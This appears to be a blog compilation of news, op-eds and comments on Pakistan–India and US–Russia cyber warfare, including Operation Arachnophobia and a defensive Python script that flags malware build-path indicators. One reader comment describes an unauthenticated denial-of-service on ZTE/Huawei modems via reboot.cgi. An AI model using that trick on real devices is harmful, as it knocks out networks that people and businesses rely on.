Operation Arachnophobia is suspected to have originated in Pakistan.
Bloodmoney: A Novel of Espionage:
Washington Post columnist David Ignatius frequently writes about the activities of intelligence agencies and often cites "anonymous" intelligence sources to buttress his opinions. He is also a novelist who draws upon his knowledge to write spy thrillers.
Ignatius's 2011 novel "Bloodmoney: A Novel of Espionage" features Dr. Omar, a computer science professor at a Pakistani university, as its main character. Omar, born in Pakistan's tribal region of South Waziristan, is a cyber security expert. One of Omar's specialties is his deep knowledge of SWIFT, a network operated by the Society for Worldwide Interbank Financial Telecommunication that tracks all international financial transactions, including credit card charges.
Omar's parents and his entire family are killed in a misdirected US drone strike. Soon after the tragedy, several undercover CIA agents are killed within days of their arrival in Pakistan. American and Pakistani investigations seek the professor's help to solve these murders. Ignatius's novel ends with the identification of the professor as the main culprit in the assassinations of the CIA agents.
In 2014, researchers from FireEye, a Silicon Valley cyber security company founded by a Pakistani-American, and ThreatConnect teamed up in their investigation of "Operation Arachnophobia" targeting Indian computers. It features a custom malware family dubbed Bitterbug that serves as the backdoor for stealing information. Though the researchers say they have not identified the specific victim organizations, they have spotted malware bundled with decoy documents related to Indian issues, according to DarkReading.com.
The operation was dubbed "Operation Arachnophobia" because variants of the Bitterbug malware detected by the researchers included build paths containing the strings "Tranchulas" and "umairaziz27"; Tranchulas is the name of an Islamabad-based Pakistani security firm, and Umair Aziz is one of its employees.
Operation Arachnophobia targeted Indian officials. It appears to have been Pakistan's response to India's Operation Hangover, which targeted Pakistan. Investigations by the Norway-based security firm Norman have shown that the Operation Hangover attack infrastructure was used primarily to extract security-related information from Pakistan and, to a lesser extent, China.
"Targeted attacks are all too common these days, but this one is certainly noteworthy for its failure to employ advanced tools to conduct its campaigns," said Jean-Ian Boutin, malware researcher at the security company ESET. "Publicly available tools to gather information on infected systems show that the attackers did not go to great lengths to cover their tracks. On the other hand, maybe they see no need to implement stealthier techniques because the simple ways still work."
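The build-path strings are the kind of artifact an analyst turns into a detection: embedded PDB or source paths survive in compiled binaries and can be matched against known indicators. The following is an added example (not code from FireEye, ThreatConnect, or the original post) that extracts Windows build paths from binary blobs and flags the two indicator strings named above; the sample blobs and the paths inside them are constructed for illustration and are not real Bitterbug samples.

```python
import re
from typing import Dict, List

# Build-path indicator strings reported for the Bitterbug variants (from the text above).
BUILD_PATH_INDICATORS = ("Tranchulas", "umairaziz27")

# The usual "strings" heuristic: runs of at least 8 printable ASCII bytes ...
_ASCII_RUN = re.compile(rb"[\x20-\x7e]{8,}")
# ... and UTF-16LE runs, since Windows binaries often store paths that way.
_UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")

# A Windows build/symbol path: drive letter, backslashes, ending in a build artifact.
_BUILD_PATH = re.compile(
    r"[A-Za-z]:\\[^\x00\"<>|*?\r\n]+?\.(?:pdb|cpp|exe|dll)\b", re.IGNORECASE
)


def extract_strings(blob: bytes) -> List[str]:
    """Return printable strings (ASCII and UTF-16LE) found in a binary blob."""
    found = [m.group(0).decode("ascii") for m in _ASCII_RUN.finditer(blob)]
    for m in _UTF16_RUN.finditer(blob):
        found.append(m.group(0).decode("utf-16le"))
    return found


def extract_build_paths(blob: bytes) -> List[str]:
    """Pull Windows build paths (e.g. embedded PDB paths) out of the blob's strings."""
    paths: List[str] = []
    for s in extract_strings(blob):
        paths.extend(_BUILD_PATH.findall(s))
    return paths


def match_indicators(blob: bytes, indicators=BUILD_PATH_INDICATORS) -> Dict[str, List[str]]:
    """Map each indicator string to the build paths it appears in (case-insensitive)."""
    hits: Dict[str, List[str]] = {}
    for path in extract_build_paths(blob):
        for indicator in indicators:
            if indicator.lower() in path.lower():
                hits.setdefault(indicator, []).append(path)
    return hits


def scan_samples(samples: Dict[str, bytes]) -> Dict[str, Dict[str, List[str]]]:
    """Scan a name -> bytes mapping and keep only samples with at least one hit."""
    report: Dict[str, Dict[str, List[str]]] = {}
    for name, blob in samples.items():
        hits = match_indicators(blob)
        if hits:
            report[name] = hits
    return report


# Constructed sample blobs (not real malware): one with an ASCII build path, one with a
# UTF-16LE build path, and a benign binary whose build path matches no indicator.
SAMPLES = {
    "sample_a.bin": b"\x00MZ\x90\x00" + b"\x00" * 16
    + b"C:\\Users\\umairaziz27\\Projects\\bb\\Release\\bb.pdb\x00" + b"\xff" * 8,
    "sample_b.bin": b"\x00" * 8
    + "D:\\Tranchulas\\build\\client.pdb".encode("utf-16le") + b"\x00\x00",
    "benign.bin": b"\x00" * 8 + b"C:\\src\\hello\\Release\\hello.pdb\x00",
}

if __name__ == "__main__":
    for name, hits in scan_samples(SAMPLES).items():
        for indicator, paths in hits.items():
            print(f"{name}: indicator {indicator!r} in {paths}")
```

The same extractor can be pointed at real files by reading them in binary mode; a build path on its own is weak evidence, so treat a hit as a pivot for further analysis rather than a verdict.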
Attack Easier Than Defense:
The fact that cyber attacks so often succeed suggests that it's easier to attack a system than to defend it. By the time such attacks are detected, it's already too late. A lot of valuable information has already been lost to attackers.
However, it's still very important to possess cyberattack capability as a deterrent. Those who lack the capacity to retaliate invite even more brazen cyberattacks.
Need for International Treaties:
Cyberattacks on infrastructure can have disastrous consequences with significant loss of human life. Disabling power grids and communication networks can hurt a lot of people and prevent delivery of aid to victims of disaster. It's important that nations work together to agree on some norms for what is permissible and what is not before there is a catastrophe.
About 30 nations, including the US, the UK, France, Germany, Russia, China, India, Iran, Israel and Pakistan, possess cyber espionage and attack capabilities. The growth and proliferation of such technologies present a serious threat to world peace. There is an urgent need for the nations of the world to come together and agree on reasonable restrictions to prevent disasters.
Revolution in Military Affairs: Cyberweapons and Robots
Pakistani-American Founder of Fireeye Cyber Firm
Pakistan Boosts Surveillance to Fight Terror
Pakistan's Biometric Registration Database
Operation Zarb e Azb Launch
Ex Indian Spy Documents RAW's Successes in Pakistan
Intelligence Failures in Preventing Daily Carnage in Pakistan
What If Musharraf Had Said NO to US After 911?
Pakistani Computer Scientist Fights Terror
Pakistani Killer Drones to Support Anti-Terror Campaign
3G 4G Rollout Spurs Data Services Boom in Pakistan
Fiber Optic Connectivity in Pakistan
MALWARE ATTACKS USED BY THE U.S. GOVERNMENT RETAIN POTENCY FOR MANY YEARS, NEW EVIDENCE INDICATES
A NEW REPORT from Rand Corp. may help shed light on the government’s arsenal of malicious software, including the size of its stockpile of so-called “zero days” — hacks that hit undisclosed vulnerabilities in computers, smartphones, and other digital devices.
The report also provides evidence that such vulnerabilities are long lasting. The findings are of particular interest because not much is known about the U.S. government’s controversial use of zero days. Officials have long refused to say how many such attacks are in the government’s arsenal or how long it uses them before disclosing information about the vulnerabilities they exploit so software vendors can patch the holes.
Rand’s report is based on unprecedented access to a database of zero days from a company that sells them to governments and other customers on the “gray market.” The collection contains about 200 entries — about the same number of zero days some experts believe the government to have. Rand found that the exploits had an average lifespan of 6.9 years before the vulnerability each targeted was disclosed to the software maker to be fixed, or before the vendor made upgrades to the code that unwittingly eliminated the security hole.
Some of the exploits survived even longer than this. About 25 percent had a lifespan of a decade or longer. But another 25 percent survived less than 18 months before they were patched or rendered obsolete through software upgrades.
Rand’s researchers found that there was no pattern around which exploits lived a long or short life — severe vulnerabilities were not more likely to be fixed quickly than minor ones, nor were vulnerabilities in programs that were more widely available.
“The relatively long life expectancy of 6.9 years means that zero-day vulnerabilities — in particular the ones that exploits are created for [in the gray market] — are likely old,” write lead researchers Lillian Ablon and Andy Bogart in their paper “Zero Days, Thousands of Nights.”
Rand, a nonprofit research group, is the first to study in this manner a database of exploits that are in the wild and being actively used in hacking operations. Previous studies of zero days have used manufactured data or the vulnerabilities and exploits that get submitted to vendor bug bounty programs — programs in which software makers or website owners pay researchers for security holes found in their software or websites.
The database used in the study belongs to an anonymous company referred to in the report as “Busby,” which amassed the exploits over 14 years, going back to 2002. Busby’s full database actually has around 230 exploits in it, about 100 of which are still considered active, meaning they are unknown to the software vendors and therefore no patches are available to fix them. The Rand researchers only had access to information on 207 zero days — the rest are recently discovered exploits the company withheld from Rand’s set “due to operational sensitivity.”
While it’s not known how many of these exploits are in the U.S. government’s arsenal, Jason Healey, a senior research scholar at Columbia University’s School for International and Public Affairs, believes the U.S. government’s zero-day stockpile is comparable in size to Busby’s.
Actually, Pakistan has more to worry about. Pakistan's critical infrastructure runs on Chinese-manufactured devices containing Chinese firmware, like Pakistan's mobile network or Internet routers. Chinese firmware is usually poorly written, with gaping holes like never seen before. A few examples are ZTE and Huawei. Modems and routers produced by these firms are riddled with very easy-to-exploit bugs. My favourite one is a DoS attack involving invoking reboot.cgi. The Chinese are so careless with their firmware that they do not even check for an authorized session. A script kiddie can bring an entire bank to a halt if it were using Chinese modems to connect to the internet.
Anon: "Like Pakistan's mobile network. Or Internet routers. Chinese firmware is usually poorly written with gaping holes like never seen before. A few examples are ZTE and Huawei."
Both ZTE and Huawei have huge market share all over the world. Here's a BT report:
"In 2011/12, Huawei was ahead of Ericsson and Nokia Siemens Network (NSN), the European telecom equipment makers which have long held the top two spots in the country by revenues. But the first few years were full of hurdles for both Huawei and ZTE, also a Chinese telecom equipment maker. European companies such as NSN, Ericsson and Alcatel Lucent had been operating in India for decades and were trusted. There was a widespread perception that Chinese products would be of inferior quality."
And Europe is using a lot of Chinese telecom equipment:
A second strategy, exemplified by telecoms equipment maker Huawei Technologies, is a straightforward effort to raise margins by diversifying out of the low-margin Chinese market into higher-margin foreign ones. Huawei has derived more than half its sales from abroad for over a decade, and has gradually increased its presence in European markets, in part through loose alliances with major clients such as BT, Orange, Deutsche Telekom, and Telefónica. It has also moved quickly into the device sector. From tablets to smartphones and 3G keys, its products are now spreading across Europe, as are its greenfield investments in European R&D centers. Its efforts to expand through M&A have been hampered by its image as an arm of the Chinese state—although privately owned, it has benefited from huge lines of credit from Chinese policy banks, and has never put to rest rumors of close ties with the People’s Liberation Army.
Pakistan has a large number of hackers and has the capability to respond to any threat.
The global war in Cyberia has begun — and will never end
by NIALL FERGUSON
To each American administration, its war. For Truman and Eisenhower, Korea. For Kennedy, Johnson and Nixon, Vietnam. For Carter and Reagan, the culmination of the Cold War. For both Bushes, Iraq. For Clinton, ex-Yugoslavia. For Obama, Afghanistan.
Which will be Donald Trump’s war? There is good reason to fear it could be the Second Korean War. Or it could be yet another quagmire in the Middle East. His most excitable critics warn that the Third World War will happen on his watch. But I am more worried about the First Cyber War — because that war has already begun.
Last week’s cyber-attack was just the latest directed against the US by WikiLeaks: the release of a vast cache of documents stolen from the CIA.
In a tweet, WikiLeaks claimed these revealed “CIA hacker malware a threat to journalists: infests iPhone, Android bypassing Signal, Confide encryption”.
Actually, none of the documents mentions Signal, but that’s not the point. In the strange land of Cyberia — the twilight zone inhabited by Russian intelligence operatives — cyber-warfare is mainly about the spread of disinformation under the guise of leaking classified or confidential information.
To visit the WikiLeaks website is to enter the trophy room of Cyberia. Here is the “Hillary Clinton Email Archive”, over there are “The Podesta Emails”. Not all the leaked documents are American, but you will look in vain for leaks calculated to embarrass Russia. Julian Assange may still skulk in the Ecuadorean embassy in London but he lives in Cyberia, Vladimir Putin’s honoured guest.
Computer scientists have understood the disruptive potential of cyber-warfare since the earliest days of the internet. At first it was adolescent hackers who caused mayhem: geeks such as Robert Tappan Morris, who almost crashed the internet in 1988 by releasing a highly infectious software worm.
It is still the case that a lot of cyber-attacks are carried out by non-state actors: teenage vandals, criminals, “hacktivists” or terrorist organisations. However, the most striking development of the past year has been the advent of Cyberia.
As the country that built the internet, the US was bound to lead in cyber-warfare. During the 2003 Iraq invasion, US spies penetrated Iraqi networks and sent messages urging generals to surrender. Seven years later the US and Israel unleashed the Stuxnet virus on Iran’s nuclear facilities. The problem is not just that two can play at that game. It is that no one knows how many people can play at any number of cyber-games.
In recent years, the US has found itself under cyber-attack from Iran, North Korea and China. However, these attacks were directed against companies (notably Sony Pictures). The Russians are the first to wage war directly against the US government. They learnt the ropes in attacks on Estonia, Georgia and Ukraine. Last year, using WikiLeaks and the blogger Guccifer 2.0 as proxies, they launched a sustained assault on the US political system, using the Clinton emails and those of her campaign manager John Podesta to undermine the credibility of the Democratic Party’s presidential candidate.
Let’s leave aside the question of whether that interference decided the election in favour of Trump. The critical point is that Moscow was undeterred. For specialists in national security, this is only one of many perplexing features of cyber-war. Accustomed to the elegant theories of “mutually assured destruction” that evolved during the Cold War, they are struggling to develop a doctrine for a different form of conflict, with countless potential attackers and numerous gradations of destructiveness.
For Joseph Nye of Harvard’s Kennedy School, deterrence may be salvageable, but that can only be true now if America is prepared to make an example of an aggressor. The three other options Nye proposes are to ramp up cyber-security, to try to “entangle” potential aggressors in trade and other relationships (so as to raise the cost of cyber-attacks to them), or to establish global taboos against cyber, like those against biological and chemical weapons.
Nye’s analysis is not very comforting. Given the sheer number of cyber-aggressors, defence seems doomed to lag behind offence. And the Russians have proved themselves to be indifferent to both entanglement and taboos, even if China seems more amenable to Nye’s approach.
How scared should we be of Cyberia? For Princeton’s Anne-Marie Slaughter, our hyper-networked world is, on balance, a benign place and America “will gradually find the golden mean of network power”. At the other extreme is Joshua Cooper Ramo, whose book The Seventh Sense argues for the erection of real and virtual “gates” to shut out the Russians and other malefactors. But Ramo himself quotes the three rules of computer security devised by the NSA cryptographer Robert Morris Sr: 1. Do not own a computer; 2. Do not power it on; 3. Do not use it. If we all ignore those rules, how will any gates keep out the Cyberians?
An intellectual arms race is on to devise a viable doctrine of cyber-security. My 10 cents’ worth is that those steeped in the traditional thinking of national security will not come up with it. A realistic goal is not to deter attacks or retaliate against them but to regulate all the various networks on which our society depends so that they are resilient — or, better still, “anti-fragile”, a term coined by Nassim Taleb to describe a system that grows stronger under attack.
Like the financial network, our social, commercial and infrastructural networks are under constant attack from fools and knaves. There is nothing we can do to stop them. The most we can do is to design networks so that the ravages of Cyberia can’t cause a total outage.
Trump’s war has begun: it is the First Cyber War. Like all wars, its first casualty was truth. Unlike other wars, it will have no last casualty, as it is a war without end. Get used to it. Or get rid of your computer.
Can Cyber Warfare Be Deterred? by Joseph Nye
Fear of a “cyber Pearl Harbor” first appeared in the 1990s, and for the past two decades, policymakers have worried that hackers could blow up oil pipelines, contaminate the water supply, open floodgates and send airplanes on collision courses by hacking air traffic control systems. In 2012, then-US Secretary of Defense Leon Panetta warned that hackers could “shut down the power grid across large parts of the country.”
None of these catastrophic scenarios has occurred, but they certainly cannot be ruled out. At a more modest level, hackers were able to destroy a blast furnace at a German steel mill last year. So the security question is straightforward: Can such destructive actions be deterred?
It is sometimes said that deterrence is not an effective strategy in cyberspace, because of the difficulties in attributing the source of an attack and because of the large and diverse number of state and non-state actors involved. We are often not sure whose assets we can hold at risk and for how long.
Attribution is, indeed, a serious problem. How can you retaliate when there is no return address? Nuclear attribution is not perfect, but there are only nine states with nuclear weapons; the isotopic identifiers of their nuclear materials are relatively well known; and non-state actors face high entry barriers.
None of this is true in cyberspace where a weapon can consist of a few lines of code that can be invented (or purchased on the so-called dark web) by any number of state or non-state actors. A sophisticated attacker can hide the point of origin behind the false flags of several remote servers.
While forensics can handle many “hops” among servers, it often takes time. For example, an attack in 2014 in which 76 million client addresses were stolen from JPMorgan Chase was widely attributed to Russia. By 2015, however, the US Department of Justice identified the perpetrators as a sophisticated criminal gang led by two Israelis and an American citizen who lives in Moscow and Tel Aviv.
Attribution, however, is a matter of degree. Despite the dangers of false flags and the difficulty of obtaining prompt, high-quality attribution that would stand up in a court of law, there is often enough attribution to enable deterrence.
For example, in the 2014 attack on SONY Pictures, the United States initially tried to avoid full disclosure of the means by which it attributed the attack to North Korea, and encountered widespread skepticism as a result. Within weeks, a press leak revealed that the US had access to North Korean networks. Skepticism diminished, but at the cost of revealing a sensitive source of intelligence.
Prompt, high-quality attribution is often difficult and costly, but not impossible. Not only are governments improving their capabilities, but many private-sector companies are entering the game, and their participation reduces the costs to governments of having to disclose sensitive sources. Many situations are matters of degree, and as technology improves the forensics of attribution, the strength of deterrence may increase.
Moreover, analysts should not limit themselves to the classic instruments of punishment and denial as they assess cyber deterrence. Attention should also be paid to deterrence by economic entanglement and by norms.
Economic entanglement can alter the cost-benefit calculation of a major state like China, where the blowback effects of an attack on, say, the US power grid could hurt the Chinese economy. Entanglement probably has little effect on a state like North Korea, which is weakly linked to the global economy. It is not clear how much entanglement affects non-state actors. Some may be like parasites that suffer if they kill their host, but others may be indifferent to such effects.
As for norms, major states have agreed that cyber war will be limited by the law of armed conflict, which requires discrimination between military and civilian targets and proportionality in terms of consequences. Last July, the United Nations Group of Government Experts recommended excluding civilian targets from cyberattacks, and that norm was endorsed at last month’s G-20 summit.
It has been suggested that one reason why cyber weapons have not been used more in war thus far stems precisely from uncertainty about the effects on civilian targets and unpredictable consequences. Such norms may have deterred the use of cyber weapons in US actions against Iraqi and Libyan air defenses. And the use of cyber instruments in Russia’s “hybrid” wars in Georgia and Ukraine has been relatively limited.
The relationship among the variables in cyber deterrence is a dynamic one that will be affected by technology and learning, with innovation occurring at a faster pace than was true of nuclear weapons. For example, better attribution forensics may enhance the role of punishment; and better defenses through encryption may increase deterrence by denial. As a result, the current advantage of offense over defense may change over time.
Cyber learning is also important. As states and organizations come to understand better the importance of the Internet to their economic wellbeing, cost-benefit calculations of the utility of cyber warfare may change, just as learning over time altered the understanding of the costs of nuclear warfare.
Unlike the nuclear age, when it comes to deterrence in the cyber era, one size does not fit all. Or are we prisoners of an overly simple image of the past? After all, when nuclear punishment seemed too draconian to be credible, the US adopted a conventional flexible response to add an element of denial in its effort to deter a Soviet invasion of Western Europe. And while the US never agreed to a formal norm of “no first use of nuclear weapons,” eventually such a taboo evolved, at least among the major states. Deterrence in the cyber era may not be what it used to be, but maybe it never was.
US scientists at U of Michigan 'hack' #India electronic #vote17 machines - BBC News. #UPElection2017
Scientists at a US university say they have developed a technique to hack into Indian electronic voting machines.
After connecting a home-made device to a machine, University of Michigan researchers were able to change results by sending text messages from a mobile.
Indian election officials say their machines are foolproof, and that it would be very difficult even to get hold of a machine to tamper with it.
India uses about 1.4m electronic voting machines in each general election.
A video posted on the internet by the researchers at the University of Michigan purportedly shows them connecting a home-made electronic device to one of the voting machines used in India.
Professor J Alex Halderman, who led the project, said the device allowed them to change the results on the machine by sending it messages from a mobile phone.
"We made an imitation display board that looks almost exactly like the real display in the machines," he told the BBC. "But underneath some of the components of the board, we hide a microprocessor and a Bluetooth radio."
"Our lookalike display board intercepts the vote totals that the machine is trying to display and replaces them with dishonest totals - basically whatever the bad guy wants to show up at the end of the election."
In addition, they added a small microprocessor which they say can change the votes stored in the machine between the election and the vote-counting session.
India's electronic voting machines are considered to be among the most tamperproof in the world.
There is no software to manipulate - records of candidates and votes cast are stored on purpose-built computer chips.
Paper and wax seals
India's Deputy Election Commissioner, Alok Shukla, said even getting hold of machines to tamper with would be very difficult.
"It is not just the machine, but the overall administrative safeguards which we use that make it absolutely impossible for anybody to open the machine," he told the BBC.
"Before the elections take place, the machine is set in the presence of the candidates and their representatives. These people are allowed to put their seal on the machine, and nobody can open the machine without breaking the seals."
The researchers said the paper and wax seals could be easily faked.
However, for their system to have any impact they would need to install their microchips on many voting machines, no easy task when 1,368,430 were used in the last general election in 2009.
India, Pakistan cyber war intensifies
NEW DELHI: Indian hackers claimed to have hacked the Islamabad, Peshawar, Multan International and Karachi airport websites
The hack comes just days after Pakistani hackers, identifying themselves as 'Alone Injector', posted offensive content on NSG's official homepage. As most were preparing to celebrate New Year, hackers from India and Pakistan were busy firing shots across the online border in the ongoing cyber war between the two countries.
Indian hackers allegedly infected three Pakistan airport websites with ransomware claiming that this was to avenge hacking of the official website of the elite National Security Guard (NSG) by their counterpart in Pakistan.
Indian hackers on Monday night claimed to have hacked the Islamabad, Peshawar, Multan International and Karachi airport websites. Not only have they hacked the websites and brought them down, but they have also injected them with ransomware, which restricts the owners' use of their own websites. Indian hackers locked access to the websites and are demanding bitcoins (virtual money) in exchange for unlocking them. However, an Indian hacker told Mail Today that the last time, the money they got from Pakistan to unlock their computers was donated to needy kids, but this time they will not share the key to unlock the sites.
The move came just a day after Pakistani hackers, identifying themselves as 'Alone Injector', posted the offensive content on NSG's official homepage. The website belonging to the 'black cat' commandos is maintained from the NSG headquarters and gives out basic information about the force, its origin and operations.
The matter has been brought to the notice of the National Informatics Centre, and remedial action is in process. Retaliating immediately, Indian hackers have launched a massive attack on crucial Pakistani establishments and warned both Pakistani hackers and the government against attacking India further.
This hacking group had in the past infected Pakistan government systems, taken control of hundreds of computers and locked all of their data, making it inaccessible, using a malicious programme. The hacking group also leaked details of Pakistan army officers and banking details.
However, there was no confirmation by any security agency about it, as the hackers from both countries are not officially. This fighting started last week after Pakistani cyber attackers hacked Thiruvananthapuram airport's website. A group of cyber experts from Kerala - the 'Mallu Cyber Soldiers' - decided to respond in kind: by hacking the website of a Pakistani airport. The hackers obtained the login information for the website of Sialkot International Airport in Pakistan's Punjab province. They changed the password and shared the new login details with the public. Experts believe the hacking of airport websites can be used to get out crucial information about flights, which can have serious consequences.
Moreover, leaking details about individual airports - from logistics to facilities - is also dangerous. Experts believe that intelligence gathering has increased, as hackers are not only defacing the sites but are silently spying on critical networks. 'Indian hackers have only replied after observing the malicious intentions of Pakistani hackers.
'Techies across the border targeted Indian sites, as a result of which NSG's website was hacked. Such fights are common, but now the intensity of attacks has increased manyfold, as hackers from both countries are targeting crucial websites,' said Kislay Choudhary, a cyber crime expert.
America must defend itself against the real national security menace
by Fareed Zakaria
Since the North Korean government’s 2014 attacks on Sony Pictures Entertainment, many in the intelligence community, including Adm. Michael S. Rogers, have warned that “we’re at a tipping point.” Rogers, head of the National Security Agency and U.S. Cyber Command, testified to Congress in 2015 that the country had no adequate deterrent against cyberattacks. He and many others have argued for an offensive capacity forceful enough to dissuade future threats.
But the digital realm is a complex one, and old rules will not easily translate. The analogy that many make is to nuclear weapons. In the early Cold War, that new category of weaponry led to the doctrine of deterrence, which in turn led to arms-control negotiations and other mechanisms to foster stable, predictable relations among the world’s nuclear powers.
But this won’t work in the cyber realm, Joseph Nye says in an important new essay in the journal International Security. First, the goal of nuclear deterrence has been “total prevention” — to avert a single use of nuclear weapons. Cyberattacks happen all the time, everywhere. The Defense Department reports getting 10 million attacks a day. Second, there is the problem of attribution. Nye quotes defense official William Lynn, who observed in 2010, “Whereas a missile comes with a return address, a computer virus generally does not.” That’s why it is so easy for the Russian government to deny any involvement with the hacking against the Democratic National Committee. It is hard to establish ironclad proof of the source of any cyberattack — which is a large part of its attractiveness as an asymmetrical weapon.
Nye argues that there are four ways to deal with cyberattacks: punishment, entanglement, defense and taboos. Punishment involves retaliation, and although it is worth pursuing, both sides can play that game, and it could easily spiral out of control.
Entanglement means that if other countries were to harm the United States, their own economies would suffer. It strikes me as of limited value because there are ways to attack the United States discreetly without shooting oneself in the foot (as Russia has shown recently, and as Chinese cybertheft of intellectual property shows as well). And it certainly wouldn’t deter groups such as the Islamic State, al-Qaeda or even WikiLeaks.
The other two strategies merit more consideration. Nye contends that the United States should develop a serious set of defenses, beyond simply governmental networks, that are modeled on public health. Regulations and information would encourage the private sector to follow some simple rules of “cyber hygiene” that could go a long way toward creating a secure national network. This new system of defenses should become standard in the digital world.
The final strategy Nye suggests is to develop taboos against certain forms of cyberwarfare. He points out that after the use of chemical weapons in World War I, a taboo grew around their use, was enacted into international law and has largely held for a century. Similarly, in the 1950s, many strategists saw no distinction between tactical nuclear weapons and “normal” weapons. Gradually, countries came to shun any use of nuclear weaponry, a mutual understanding that has also survived for decades. Nye recognizes that no one is going to stop using cyber-tools but believes that perhaps certain targets could be deemed off-limits, such as purely civilian equipment.
Of course, the development of such norms would involve multilateral negotiations, international forums, rules and institutions, all of which the Trump administration views as globaloney. But at least it is working hard to prevent Yemeni tourists from entering the country.
Wikileaks reveal #American #Spy Agency #NSA #Cyber Weapons Used to Hack #Pakistan mobile system http://bit.ly/2nQ1VHn via @techjuicepk
New information about the involvement of the US in hacking Pakistan's mobile system has been found in a release by Wikileaks. The leak points to NSA cyber weapons that include code related to the hacking of Pakistan's mobile system.
NSA’s interest in Pakistan
The NSA (National Security Agency), responsible for global monitoring, collection, and processing of information and data for foreign intelligence and counterintelligence purposes in the USA, has allegedly spied on Pakistani civilian and military leadership in the past. Edward Snowden, a former NSA employee, has also suggested in the past that the NSA used wiretapping and cyber weapons to spy on many international leaders.
Scope of new information
On Saturday, Wikileaks revealed hundreds of cyber weapon variants, which include code pointing towards the NSA hacking Pakistan's mobile system.
The link shared in the tweet by Wikileaks’ official account points to a Github repository containing the decrypted files pertaining to NSA cyber weapons. A complete analysis of these files by a cyber security expert is needed to further highlight the severity of the situation. Initial impressions, however, seem to indicate that these leaks will certainly provide more substance to previous allegations against NSA.
#Cyberattack Hits #Ukraine Then Spreads Internationally. #NSA #hackingtool #WannaCry #Petya #Russia
Computer systems from Ukraine to the United States were struck on Tuesday in an international cyberattack that was similar to a recent assault that crippled tens of thousands of machines worldwide.
In Kiev, the capital of Ukraine, A.T.M.s stopped working. About 80 miles away, workers were forced to manually monitor radiation at the old Chernobyl nuclear plant when their computers failed. And tech managers at companies around the world — from Maersk, the Danish shipping conglomerate, to Merck, the drug giant in the United States — were scrambling to respond. Even an Australian factory for the chocolate giant Cadbury was affected.
It was unclear who was behind this cyberattack, and the extent of its impact was still hard to gauge Tuesday. It started as an attack on Ukrainian government and business computer systems — an assault that appeared to have been intended to hit the day before a holiday marking the adoption in 1996 of Ukraine’s first Constitution after its break from the Soviet Union. The attack spread from there, causing collateral damage around the world.
The outbreak was the latest and perhaps the most sophisticated in a series of attacks making use of dozens of hacking tools that were stolen from the National Security Agency and leaked online in April by a group called the Shadow Brokers.
Like the WannaCry attacks in May, the latest global hacking took control of computers and demanded digital ransom from their owners to regain access. The new attack used the same National Security Agency hacking tool, Eternal Blue, that was used in the WannaCry episode, as well as two other methods to promote its spread, according to researchers at the computer security company Symantec.
The National Security Agency has not acknowledged its tools were used in WannaCry or other attacks. But computer security specialists are demanding that the agency help the rest of the world defend against the weapons it created.
“The N.S.A. needs to take a leadership role in working closely with security and operating system platform vendors such as Apple and Microsoft to address the plague that they’ve unleashed,” said Golan Ben-Oni, the global chief information officer at IDT, a Newark-based conglomerate hit by a separate attack in April that used the agency’s hacking tools. Mr. Ben-Oni warned federal officials that more serious attacks were probably on the horizon.
The vulnerability in Windows software used by Eternal Blue was patched by Microsoft in March, but as the WannaCry attacks demonstrated, hundreds of thousands of groups around the world failed to properly install the fix.
“Just because you roll out a patch doesn’t mean it’ll be put in place quickly,” said Carl Herberger, vice president for security at Radware. “The more bureaucratic an organization is, the higher chance it won’t have updated its software.”
Because the ransomware used at least two other ways to spread on Tuesday — including stealing victims’ credentials — even those who used the Microsoft patch could be vulnerable and potential targets for later attacks, according to researchers at F-Secure, a Finnish cybersecurity firm, and others.
A Microsoft spokesman said the company’s latest antivirus software should protect against the attack.
The Ukrainian government said several of its ministries, local banks and metro systems had been affected. A number of other European companies, including Rosneft, the Russian energy giant; Saint-Gobain, the French construction materials company; and WPP, the British advertising agency, also said they had been targeted.
The Opinion Pages | EDITORIAL
When Cyberweapons Go Missing
By THE EDITORIAL BOARD, JULY 4, 2017
Twice in the past few months, powerful cyberattacks have wreaked havoc on the world, shutting down tens of thousands of computers, including critical machines in hospitals, a nuclear site and businesses. The attacks were initially thought to be schemes to collect ransom, but their goals — whether money, politics or just chaos — have become increasingly blurred. One thing seems clear: The weapons for the attack were developed by the National Security Agency and stolen from it.
That’s chilling. After the first attack, Brad Smith, the president of Microsoft, said the theft of the cyberweapons was equivalent to Tomahawk missiles’ being stolen from the military, and he issued a scathing critique of the government’s stockpiling of computer vulnerabilities. The N.S.A. has not only failed to assist in identifying the vulnerabilities its weapons were designed to exploit but has also not even acknowledged their existence or their theft.
It remains a mystery whether the N.S.A. knows how its weapons were stolen. What is known is that a group called Shadow Brokers started offering them for sale in August and made them public in April. It promised a fresh batch last month, offering them to monthly subscribers. Former intelligence officials said it was clear the weapons came from an N.S.A. unit formerly known as Tailored Access Operations.
Once publicly available, the weapons can be reconfigured for many purposes and used by anyone with some computer savvy. North Korea was thought to be a culprit in the first wave of attacks, and Russian hackers may have been behind the second. Other forces may be at work, too. A cybersecurity officer with the IDT Corporation in Newark, Golan Ben-Oni, has made waves with warnings that ransom demands could be a cover for far deeper invasions to steal confidential information.
Secrecy, of course, is the N.S.A.’s stock in trade, and acknowledging authorship of stolen cyberweapons runs counter to everything the spy agency does. A spokesman for the National Security Council at the White House was quoted as saying that the administration “is committed to responsibly balancing national security interests and public safety and security.”
Fixing this deadly serious problem is certain to be complex, but the task is urgent. The N.S.A. clearly needs to do a better job of safeguarding the cyberweapons it is developing and also neutralizing the damage their theft has unleashed. Microsoft, whose software vulnerabilities were exploited in the attacks, and companies that use its software will have to strengthen their defenses.
Beyond that, the federal government may want to offer grants as incentives to groups doing malware analysis. Once conclusively identified, the culprits behind the attacks must be penalized in some way, such as with sanctions. While the immediate focus needs to be on concrete responses, it is also worth thinking seriously about more global cooperation, such as the Digital Geneva Convention proposed by Microsoft as a way to prevent cyberwarfare.
Pakistan currently lacks offensive capability. In recent times a wave of insecurity has been felt among the top brass, and we need to address this issue on a war footing. The cyber threat landscape already shows Pakistan among the most targeted countries, with its industrial base especially vulnerable to ICS attacks.
IT ministry to come up with plan to ensure country’s cyber-security
National | 12 HOURS AGO | BY APP
The Ministry of Information Technology has been entrusted with the responsibility of proposing an appropriate organisation to ensure the cyber-security of Pakistan.
The decision was taken during a high-level meeting on Thursday to develop a framework and way forward to coordinate and evolve a mechanism for country’s cyber-security.
National Security Adviser Nasser Khan Janjua chaired the meeting. National Security Division secretary, representatives from Ministry of Information and Broadcasting, Ministry of Information Technology, Pakistan Electronic Media Regulatory Authority (PEMRA), Pakistan Telecommunication Authority (PTA) and Federal Investigation Agency (FIA) attended the meeting.
